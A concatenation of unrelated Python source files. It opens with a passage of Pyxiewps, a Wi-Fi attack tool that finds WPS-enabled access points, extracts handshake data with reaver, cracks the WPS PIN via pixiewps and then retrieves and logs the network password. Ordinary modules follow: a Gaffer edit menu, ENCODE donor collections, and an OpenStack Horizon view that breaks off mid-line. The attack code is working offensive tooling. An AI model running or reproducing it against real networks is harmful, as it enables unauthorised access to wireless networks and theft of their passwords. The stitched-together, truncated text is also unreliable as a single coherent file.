if airodump: system('pkill airodump')
if kill_tree:
pids.extend(self.get_process_children(proc.pid))
for pid in pids:
try:
kill(pid, SIGKILL)
except OSError:
pass
return output
return output
def get_process_children(self, pid):
"""
Returns the pids of the program to kill all the process tree
"""
proc = subprocess.Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True, stdout = subprocess.PIPE)
stdout = proc.communicate()[0]
return [int(p) for p in stdout.split()]
def exit_clean(self):
"""
Clean before quiting
"""
if path.isfile('/root/pixiewps/Makefile') or path.isfile('/root/reaver-wps-fork-t6x/src/Makefile'):
print OPTION + "The pixiewps and reaver files are no longer needed"
print " and they live in the root home directory,"
choice = raw_input("%sDo you wish to erase them? [Y/n]" %INPUT)
if choice in CHOICES_YES:
system('cd /root && rm -r pixiewps/ && rm -r reaver-wps-fork-t6x/')
if c.IS_MON:
c.set_iface("DOWN")
system('pkill airodump')
system('rm -f /usr/local/etc/reaver/*.wpc')
exit()
class Config():
"""
Configuration functions
"""
IFACE_MON = 'caca' # means 'shit' in spanish
IFACE = 'caca'
IS_MON = False
def screen_size(self):
"""
Returns the window size
"""
return int(subprocess.check_output(['stty','size']).split()[1])
def program_exists(self, program):
"""
Checks the program fot its existance
"""
cmd = "which " + program
output = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE)
output = output.communicate()[0]
if output != "":
return True # Exists
else:
return False # Nope
def get_uid(self):
"""
Returns the user ID
"""
uid = subprocess.check_output(['id','-u']).strip()
return uid
def internet_on(self):
"""
Checks Inet connection
"""
try:
stri = "https://duckduckgo.com" # Checks connection with duckduckgo
data = urllib.urlopen(stri)
return True
except:
return False
def check_iface(self):
"""
Checks for any monitor interfaces already set.
"""
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
mon = ''
for linea in proc:
if 'Monitor' in linea:
mon = linea[0:10].strip()
if mon != '':
self.IFACE_MON, self.IFACE = mon,mon
self.IS_MON = True
return True
else:
return False
def get_iface(self):
"""
If any monitor interfaces are found, returns the wlans.
If more than onw are found, ask the user to choose.
If monitor mode is already enable, returns the name.
"""
if self.IS_MON: # If the interface is already in monitor mode, it returns its name
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
for linea in proc:
if 'Monitor' in linea:
mon = linea[0:10].strip()
self.IFACE_MON = mon
return mon
else:
proc = subprocess.Popen('iwconfig',shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE).communicate()[0].strip().split('\n')
ifaces = []
for linea in proc:
if 'IEEE' in linea:
ifaces.append(linea[0:10].strip())
if len(ifaces) == 1 and ifaces[0] == '':
print ALERT + "Are... you... f*ing.. kidding me?"
print " Please check if any wireless device in your PC."
print " if you are running on a virtual machine"
print " go get an USB wireless device."
print " Go get a WiFi for dummies also."
exit()
elif len(ifaces) > 1:
print INPUT + "Pick it... "
for i in ifaces:
print str(ifaces.index(i)) + " >> " + i
while True: # Control the input! you bugseeker!
try:
choice = int(raw_input(INPUT))
self.IFACE = ifaces[choice]
return ifaces[choice]
break
except (IndexError, ValueError):
print ALERT + "Number between 0 and %s" %(len(ifaces)-1) #Index error handling
except KeyboardInterrupt:
print
print ALERT + "Interrupted program!"
print
engine.exit_clean()
else:
self.IFACE = ifaces[0]
return ifaces[0]
def set_iface(self, status):
"""
Wireless interface driver. Puts it on monitor mode
and puts it back on normal mode.
"status" variable is used only for the sake of readability and it's based
on the "self.IS_MON" boolean
"""
if self.IS_MON:
print INFO + 'Restoring %s wireless interface...' %self.get_iface()
system('ifconfig %s down' %(self.IFACE_MON))
system('iwconfig %s mode Managed' %(self.IFACE_MON))
system('ifconfig %s up' %(self.IFACE_MON))
self.IS_MON = False
print INFO + 'Done'
else:
print INFO + 'Enabling NSA mode on %s...' %(self.get_iface())
system('ifconfig %s down' %(self.IFACE))
system('iwconfig %s mode monitor' %(self.IFACE))
system('ifconfig %s up' %(self.IFACE))
self.IFACE_MON = self.IFACE
self.IS_MON = True
print INFO + "NSA mode enabled on %s" %self.IFACE
print
def data_file(self, data):
"""
Saves the data into a file
"""
system('echo INFORMATION >> %s' %OUTPUT_FILE)
with open(OUTPUT_FILE, 'a+') as f:
date = str(datetime.datetime.now())
f.write(date+'\n')
f.writelines(data)
print INFO + "All data were saved into %s. NSA does the same thing with your mails." %OUTPUT_FILE
def get_binaries(self, compileAircrack = False):
"""
Installs reaver, pixiewps and other stuff
"""
if not self.internet_on():
print
print ALERT + "How am I supposed to download something"
print " when you are not connected to the internet?"
print " Please check your connection so that Pyxiewps"
print " can install all the required programs."
print
engine.exit_clean()
if compileAircrack:
system('mkdir pyxietmp')
chdir('pyxietmp')
print INFO + "Downloading source code..."
system('wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz') # Get source code
print INFO + "Decompressing..."
system('tar -xf aircrack-ng-1.2-rc2.tar.gz') # Decompress
chdir('aircrack-ng-1.2-rc2')
print INFO + "Installing dependencies..."
system('apt-get -y install pkg-config libnl-3-dev libnl-genl-3-dev') # Dependencies
print INFO + "Compiling..."
system('make && make strip && make install') # Compile
print INFO + "Cleaning files..."
chdir('../../')
system('rm -r pyxietmp') # Clean
print INFO + "Done!"
engine.check(check_again = True) # Check
git = 'apt-get -y install git'
reaver_dep = 'apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng'
pixie_dep = 'sudo apt-get -y install libssl-dev'
reaver_apt = 'apt-get -y install reaver'
reaver = 'git clone https://github.com/t6x/reaver-wps-fork-t6x.git'
pixiewps = 'git clone https://github.com/wiire/pixiewps.git'
aircrack = 'apt-get -y install aircrack-ng'
if not engine.GIT:
print INFO + "Installing git..."
proc4 = system(git)
if not engine.AIRMON:
print INFO + "Installing aircrack..."
proc5 = system(aircrack)
if not engine.PIXIEWPS:
print INFO + "Installing pixiewps dependencies..."
proc2 = system(pixie_dep)
print INFO + "Downloading pixiewps..."
proc3 = system(pixiewps)
if not engine.REAVER:
print INFO + "Installing reaver dependencies..."
proc = system(reaver_dep)
print INFO + "Downloading reaver..."
if 'kali' in subprocess.check_output('uname -a', shell = True):
proc1 = system(reaver_apt)
else:
proc1 = system(reaver)
if path.isdir('pixiewps') and not engine.PIXIEWPS:
print INFO + "Installing pixiewps..."
system('cd pixiewps/src && make && make install')
print INFO + "Done"
if path.isdir('reaver-wps-fork-t6x') and not engine.REAVER:
print INFO + "Installing reaver..."
system('cd reaver-wps-fork-t6x* && cd src && ./configure && make && make install')
print INFO + "Done"
engine.check(check_again = True)
def check_reaver_version(self):
"""
Returns reaver version if it's installed
"""
output = subprocess.Popen('reaver -h', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
output = output.communicate()
if 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[0] and 'mod by t6_x' in output[0]:
return '1.5.2'
elif output[0] != '':
return output[0][9:12]
elif 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[1] and 'mod by t6_x' in output[1]:
return '1.5.2'
elif output[1] != '':
return output[1][9:12]
class Attack():
"""
Attack functions
"""
def get_wps_aps(self):
"""
Enumerates any WPS-active APs
Goes to get_reaver_info
"""
print INFO + "WPS-active APs?! Hello? Anyone there?..."
cmd = 'airodump-ng -c 1-11 --wps %s' %(c.IFACE_MON)
if CHANNEL != '':
cmd = 'airodump-ng -c %d --wps %s' %(CHANNEL, c.IFACE_MON)
output = engine.run(cmd, shell = True, timeout = AIRODUMP_TIME, airodump = True)
ap_list = engine.parse_airodump(output)
last = len(ap_list)-1
if ap_list == []:
print
print ALERT + "Nooooooope!"
print
if not FOREVER:
engine.exit_clean()
else:
for_fill = ap_list #\
essids = [] #|
for line in for_fill: #|- Formats the list
line = line.split('|') #|
essids.append(line[5]) #|
fill = len(max(essids)) #/
print INFO + "Oh! Here they are:"
for line in ap_list:
line = line.split('|')
fill_line = fill - len(line[5])
print '\t' + INPUT + str(line[5]) + ' '*fill_line + ' || ' + line[0] + ' || Channel: ' + line[1] + ' || RSSI: ' + line[2] + ' || WPS: ' + line[4]
while True:
try:
if len(ap_list) != 1 and PROMPT_APS:
choice = raw_input("%sIndex of the AP or press ENTER to shotgun the shit out all of them: " %INPUT)
if choice == '':
break
else:
choice = int(choice)
temp = []
temp.append(ap_list[choice])
ap_list = temp
break
else:
break
except KeyboardInterrupt:
print
engine.exit_clean()
break
except (ValueError, IndexError):
print ALERT + "Number between 0 and %d" %last
if path.isfile('pyxiewpsdata.txt'):
match = []
wpspin = []
with open('pyxiewpsdata.txt') as f:
already_found_pins = f.readlines()
if len(already_found_pins) > 1:
already_found_pins.reverse() # reverts the list so it takes the newest pin
for target in ap_list: # if any pin were changed by the AP administrator
for line in already_found_pins[1:]:
if target.split('|')[5] == line.strip():
match.append(target)
wpspin.append(already_found_pins[already_found_pins.index(line)-1].strip())
for i in set(match):
print OPTION + "Dude... you already got thisone: %s" %i.split('|')[5]
print '\t'+ INPUT + wpspin[match.index(i)]
if not OVERRIDE:
print INFO + "Will attack again as requested."
print
else:
print INFO + "Skiped forevaah."
ap_list.remove(i) # Removed from the AP list
blacklist.append(i[:17])
print
for line in ap_list: # main for-loop
line = line.split('|')
self.get_reaver_info(line[0],line[1],line[5])
print SEPARATOR
if not FOREVER:
engine.exit_clean()
def get_reaver_info(self, bssid, channel, essid):
"""
Gets all the vital information from the AP
PKR, PKE, HASH1, HASH2, AUTHKEY
it's in the get_wps_aps for-loop
"""
print INFO + "Fetching information from %s using reaver..." %essid
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',bssid,'-vvv','-P','-l', '1','-c',channel], timeout = REAVER_TIME)
data = engine.parse_reaver(output)
if data == 'noutput':
print
print ALERT + "WOW. SUCH SECURITY. NO DATA. WOW."
print ALERT + "Try with a greater time using the -t argument"
print " and if it doesn\'t work out try to get a better signal."
print " And if even that doesn't works out..... try get a life."
print
elif data == 'more time please':
print
print ALERT + "The program retrieved some information from the AP but"
print " not all of it. Set a greater time to fetch the information"
print " with the -t argument. 6 seconds by default"
print
elif data == 'ap rate limited':
print
print ALERT + "The AP says: FUCK YOU!"
print " That\'s why reaver couldn\'t retrieve any information."
if BLACKLIST:
blacklist.append(bssid)
print INFO + "and %s won\'t be attacked again." %essid
else:
print INFO + "but %s will be attacked again as requested. You persistent fuck." %essid
print
elif data == 'cacota':
print
print "Choose a reaver session option when asked for it."
if not FOREVER:
engine.exit_clean()
else:
print INFO + "Success bitches! All the needed information were found"
for_file = ['ESSID: ' + data[10] + '\n','MAC: ' + data[11] + '\n','PKE: ' + data[0] + '\n',
'PKR: ' + data[1] + '\n','HASH1: ' + data[2] + '\n','HASH2: ' + data[3] + '\n',
'E-NONCE: ' + data[8] + '\n','R-NONCE: ' + data[9] + '\n','AUTHKEY: ' + data[4] + '\n',
'MANUFACTURER: ' + data[5] + '\n','MODEL: ' + data[6] + '\n','MODEL NUMBER: ' + data[7] + '\n']
if PRINT_REAVER:
print
for line in for_file:
print DATA + line.strip()
print
if OUTPUT and not USE_PIXIEWPS:
for_file.append('-'*40+'\n')
c.data_file(for_file)
if USE_PIXIEWPS:
self.pixie_attack(data,for_file,channel)
def pixie_attack(self,data,for_file,channel):
"""
Tries to find the WPS pin using pixiewps
"""
ESSID = data[10]
BSSID = data[11]
PKE = data[0]
PKR = data[1]
HASH1 = data[2]
HASH2 = data[3]
AUTHKEY = data[4]
E_NONCE = data[8]
R_NONCE = data[9]
cmd = ['pixiewps','-e',PKE,'-r',PKR,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE]
cmd1 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE,'-S']
cmd2 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-n',E_NONCE,'-m',R_NONCE,'-b',BSSID,'-S']
pin = ''
cmd_list = [cmd, cmd1, cmd2]
output = []
for command in cmd_list:
try:
output = engine.run(command, timeout = 2)
output = [i.strip() for i in output]
for line in output:
if '[+] WPS pin:' in line:
result = compile('\d+')
pin = result.search(line).group(0)
break
except: #Pixiewps error handling
pass
if pin != '': break
if pin != '' and len(pin) == 8:
print INFO + "Dada dada dada Afro circus Afro circus Afro pocka dot pocka dot Afro! (Success dance)"
print "\t" + INPUT + pin
for_file.append('Pin WPS: '+pin+'\n')
system('echo >> pyxiewpsdata.txt')
with open('pyxiewpsdata.txt','a+') as f:
f.write(ESSID+'\n')
f.write(pin)
elif pin == '':
print
print ALERT + "WPS pin was not found."
print " Probably, the AP is not vulnerable to this attack"
print " and never will. Move on."
print
blacklist.append(BSSID) # AP is blacklisted
if GET_PASSWORD and pin != '':
self.get_password(for_file, BSSID, pin, channel)
elif OUTPUT:
for_file.append('-'*40+'\n')
c.data_file(for_file)
def get_password(self, for_file, BSSID, pin, channel):
"""
Once the WPS pin was found, tries to get the password.
"""
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',BSSID,'-c',channel,'-p',pin,'-L'], timeout = (REAVER_TIME))
password = engine.parse_reaver(output, pin_found = True)
if password == 'no password':
print
print ALERT + "Can't get the password right now because shit happens"
print " but you can use the WPS pin to access the wireless network."
print
else:
print INFO + "Dada dada dada Afro circus Afro circus Afro pocka dot pocka dot Afro! (Again)"
print '\t' + INPUT + password.strip()
print
if OUTPUT:
for_file.append('Password: ' + password + '\n'+'-'*40+'\n')
c.data_file(for_file)
if __name__ == '__main__':
banner()
arg_parser()
try:
c = Config()
engine = Engine()
engine.check()
except KeyboardInterrupt, EOFError:
print
print ALERT + "Interrupted program!"
print
engine.exit_clean()
|
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
def appendDefinitions( menuDefinition, prefix="" ) :
menuDefinition.append( prefix + "/Undo", { "command" : undo, "shortCut" : "Ctrl+Z", "active" : __undoAvailable } )
menuDefinition.append( prefix + "/Redo", { "command" : redo, "shortCut" : "Shift+Ctrl+Z", "active" : __redoAvailable } )
menuDefinition.append( prefix + "/UndoDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Cut", { "command" : cut, "shortCut" : "Ctrl+X", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Copy", { "command" : copy, "shortCut" : "Ctrl+C", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Paste", { "command" : paste, "shortCut" : "Ctrl+V", "active" : __pasteAvailable } )
menuDefinition.append( prefix + "/Delete", { "command" : delete, "shortCut" : "Backspace, Delete", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/CutCopyPasteDeleteDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Find...", { "command" : find, "shortCut" : "Ctrl+F" } )
menuDefinition.append( prefix + "/FindDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Arrange", { "command" : arrange, "shortCut" : "Ctrl+L" } )
menuDefinition.append( prefix + "/ArrangeDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Select All", { "command" : selectAll, "shortCut" : "Ctrl+A" } )
menuDefinition.append( prefix + "/Select None", { "command" : selectNone, "shortCut" : "Shift+Ctrl+A", "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Inputs", { "command" : selectInputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Add Inputs", { "command" : selectAddInputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/InputsDivider", { "divider" : True } )
menuDefinition.append( prefix + "/Select Connected/Outputs", { "command" : selectOutputs, "active" : __selectionAvailable } )
menuDefinition.append( prefix + "/Select Connected/Add Outputs", { "command" : selectAddOutputs, "active" : __selectionAvailable } )
## A function suitable as the command for an Edit/Undo menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def undo( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.undo()
## A function suitable as the command for an Edit/Redo menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def redo( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.redo()
## A function suitable as the command for an Edit/Cut menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def cut( menu ) :
script, parent = __scriptAndParent( menu )
with Gaffer.UndoContext( script ) :
script.cut( parent, script.selection() )
## A function suitable as the command for an Edit/Copy menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def copy( menu ) :
script, parent = __scriptAndParent( menu )
script.copy( parent, script.selection() )
## A function suitable as the command for an Edit/Paste menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def paste( menu ) :
script, parent = __scriptAndParent( menu )
originalSelection = Gaffer.StandardSet( iter( script.selection() ) )
with Gaffer.UndoContext( script ) :
script.paste( parent )
# try to get the new nodes connected to the original selection
nodeGraph = __nodeGraph( menu, focussedOnly=False )
if nodeGraph is None :
return
nodeGraph.graphGadget().getLayout().connectNodes( nodeGraph.graphGadget(), script.selection(), originalSelection )
# position the new nodes sensibly
bound = nodeGraph.bound()
mousePosition = GafferUI.Widget.mousePosition()
if bound.intersects( mousePosition ) :
fallbackPosition = mousePosition - bound.min
else :
fallbackPosition = bound.center() - bound.min
fallbackPosition = nodeGraph.graphGadgetWidget().getViewportGadget().rasterToGadgetSpace(
IECore.V2f( fallbackPosition.x, fallbackPosition.y ),
gadget = nodeGraph.graphGadget()
).p0
fallbackPosition = IECore.V2f( fallbackPosition.x, fallbackPosition.y )
nodeGraph.graphGadget().getLayout().positionNodes( nodeGraph.graphGadget(), script.selection(), fallbackPosition )
nodeGraph.frame( script.selection(), extend = True )
## A function suitable as the command for an Edit/Delete menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def delete( menu ) :
script, parent = __scriptAndParent( menu )
with Gaffer.UndoContext( script ) :
script.deleteNodes( parent, script.selection() )
## A function suitable as the command for an Edit/Find menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def find( menu ) :
script, parent = __scriptAndParent( menu )
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
try :
findDialogue = scriptWindow.__findDialogue
except AttributeError :
findDialogue = GafferUI.NodeFinderDialogue( parent )
scriptWindow.addChildWindow( findDialogue )
scriptWindow.__findDialogue = findDialogue
findDialogue.setScope( parent )
findDialogue.setVisible( True )
## A function suitable as the command for an Edit/Arrange menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def arrange( menu ) :
script, parent = __scriptAndParent( menu )
nodeGraph = __nodeGraph( menu, focussedOnly=False )
if not nodeGraph :
return
graph = nodeGraph.graphGadget()
nodes = script.selection()
if not nodes :
nodes = Gaffer.StandardSet( graph.getRoot().children( Gaffer.Node ) )
with Gaffer.UndoContext( script ) :
graph.getLayout().layoutNodes( graph, nodes )
## A function suitable as the command for an Edit/Select All menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAll( menu ) :
script, parent = __scriptAndParent( menu )
for c in parent.children( Gaffer.Node ) :
script.selection().add( c )
## A function suitable as the command for an Edit/Select None menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectNone( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
script.selection().clear()
## The command function for the default "Edit/Select Connected/Inputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectInputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
inputs = Gaffer.StandardSet()
for node in script.selection() :
__inputNodes( node, inputs )
selection = script.selection()
selection.clear()
for node in inputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Add Inputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAddInputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
inputs = Gaffer.StandardSet()
for node in script.selection() :
__inputNodes( node, inputs )
selection = script.selection()
for node in inputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Outputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectOutputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
outputs = Gaffer.StandardSet()
for node in script.selection() :
__outputNodes( node, outputs )
selection = script.selection()
selection.clear()
for node in outputs :
selection.add( node )
## The command function for the default "Edit/Select Connected/Add Outputs" menu item. It must
# be invoked from a menu that has a ScriptWindow in its ancestry.
def selectAddOutputs( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
outputs = Gaffer.StandardSet()
for node in script.selection() :
__outputNodes( node, outputs )
selection = script.selection()
for node in outputs :
selection.add( node )
def __selectionAvailable( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
return True if scriptWindow.scriptNode().selection().size() else False
def __pasteAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
root = scriptNode.ancestor( Gaffer.ApplicationRoot )
return isinstance( root.getClipboardContents(), IECore.StringData )
def __nodeGraph( menu, focussedOnly=True ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
nodeGraph = None
## \todo Does this belong as a Window.focussedChild() method?
focusWidget = GafferUI.Widget._owner( scriptWindow._qtWidget().focusWidget() )
if focusWidget is not None :
nodeGraph = focusWidget.ancestor( GafferUI.NodeGraph )
if nodeGraph is not None or focussedOnly :
return nodeGraph
nodeGraphs = scriptWindow.getLayout().editors( GafferUI.NodeGraph )
return nodeGraphs[0] if nodeGraphs else None
def __scriptAndParent( menu ) :
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
script = scriptWindow.scriptNode()
nodeGraph = __nodeGraph( menu )
if nodeGraph is not None :
parent = nodeGraph.graphGadget().getRoot()
else :
parent = script
return script, parent
def __undoAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
return scriptNode.undoAvailable()
def __redoAvailable( menu ) :
scriptNode = menu.ancestor( GafferUI.ScriptWindow ).scriptNode()
return scriptNode.redoAvailable()
def __inputNodes( node, inputNodes ) :
def __walkPlugs( parent ) :
for plug in parent :
if isinstance( plug, Gaffer.Plug ) :
inputPlug = plug.getInput()
if inputPlug is not None :
inputNode = inputPlug.node()
if inputNode is not None and not inputNode.isSame( node ) :
inputNodes.add( inputNode )
else :
__walkPlugs( plug )
__walkPlugs( node )
def __outputNodes( node, outputNodes ) :
def __walkPlugs( parent ) :
for plug in parent :
if isinstance( plug, Gaffer.Plug ) :
outputPlugs = plug.outputs()
if outputPlugs :
for outputPlug in outputPlugs :
outputNode = outputPlug.node()
if outputNode is not None and not outputNode.isSame( node ) :
outputNodes.add( outputNode )
else :
__walkPlugs( plug )
__walkPlugs( node )
|
|
from snovault import (
abstract_collection,
calculated_property,
collection,
load_schema,
)
from snovault.util import Path
from pyramid.security import Authenticated
from .base import (
Item,
paths_filtered_by_status,
)
@abstract_collection(
name='donors',
unique_key='accession',
properties={
'title': "Donors",
'description': 'Listing of all types of donor.',
})
class Donor(Item):
base_types = ['Donor'] + Item.base_types
schema = load_schema('encoded:schemas/donor.json')
embedded = [
'organism',
'characterizations',
'characterizations.award',
'characterizations.lab',
'characterizations.submitted_by',
'documents',
'documents.award',
'documents.lab',
'documents.submitted_by',
'lab'
]
set_status_up = [
'characterizations',
'documents',
]
set_status_down = []
name_key = 'accession'
rev = {
'characterizations': ('DonorCharacterization', 'characterizes')
}
def unique_keys(self, properties):
keys = super(Donor, self).unique_keys(properties)
if properties.get('status') != 'replaced':
if 'external_ids' in properties:
keys.setdefault('alias', []).extend(properties['external_ids'])
return keys
@calculated_property(schema={
"title": "Characterizations",
"type": "array",
"items": {
"type": ['string', 'object'],
"linkFrom": "DonorCharacterization.characterizes"
},
})
def characterizations(self, request, characterizations):
return paths_filtered_by_status(request, characterizations)
@collection(
name='mouse-donors',
unique_key='accession',
acl=[],
properties={
'title': 'Mouse donors',
'description': 'Listing Biosample Donors'
})
class MouseDonor(Donor):
item_type = 'mouse_donor'
schema = load_schema('encoded:schemas/mouse_donor.json')
embedded = Donor.embedded + [
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments'
]
embedded_with_frame = [
Path('references', exclude=['datasets', 'publication_data']),
]
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
def __ac_local_roles__(self):
# Disallow lab submitter edits
return {Authenticated: 'role.viewing_group_member'}
@collection(
name='fly-donors',
unique_key='accession',
properties={
'title': 'Fly donors',
'description': 'Listing Biosample Donors'
})
class FlyDonor(Donor):
item_type = 'fly_donor'
schema = load_schema('encoded:schemas/fly_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments',
'characterizations']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
@collection(
name='worm-donors',
unique_key='accession',
properties={
'title': 'Worm donors',
'description': 'Listing Biosample Donors',
})
class WormDonor(Donor):
item_type = 'worm_donor'
schema = load_schema('encoded:schemas/worm_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'parent_strains',
'documents',
]
set_status_down = []
@collection(
name='human-donors',
unique_key='accession',
properties={
'title': 'Human donors',
'description': 'Listing Biosample Donors',
})
class HumanDonor(Donor):
item_type = 'human_donor'
schema = load_schema('encoded:schemas/human_donor.json')
embedded = Donor.embedded
embedded_with_frame = [
Path('references', exclude=['datasets', 'publication_data']),
]
rev = {
'children': ('HumanDonor', 'parents'),
'characterizations': ('DonorCharacterization', 'characterizes')
}
@calculated_property(schema={
"description": "Human donor(s) that have this human donor in their parent property.",
"comment": "Do not submit. Values in the list are reverse links of a human donors that have this biosample under their parents property.",
"title": "Children",
"type": "array",
"items": {
"type": ['string', 'object'],
"linkFrom": "HumanDonor.parents"
},
"notSubmittable": True,
})
def children(self, request, children):
return paths_filtered_by_status(request, children)
@collection(
name='manatee-donors',
unique_key='accession',
properties={
'title': 'Manatee donors',
'description': 'Listing Biosample Donors',
})
class ManateeDonor(Donor):
item_type = 'manatee_donor'
schema = load_schema('encoded:schemas/manatee_donor.json')
embedded = Donor.embedded + ['organism',
'genetic_modifications',
'genetic_modifications.modified_site_by_target_id',
'genetic_modifications.modified_site_by_target_id.genes',
'genetic_modifications.treatments']
set_status_up = [
'characterizations',
'source',
'genetic_modifications',
'documents',
]
set_status_down = []
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.api import keystone
from openstack_dashboard import policy
from openstack_dashboard import usage
from openstack_dashboard.usage import quotas
from openstack_dashboard.dashboards.identity.projects \
import tables as project_tables
from openstack_dashboard.dashboards.identity.projects \
import tabs as project_tabs
from openstack_dashboard.dashboards.identity.projects \
import workflows as project_workflows
from openstack_dashboard.dashboards.project.overview \
import views as project_views
from openstack_dashboard.utils import identity
from openstack_dashboard.utils import settings as setting_utils
PROJECT_INFO_FIELDS = ("domain_id",
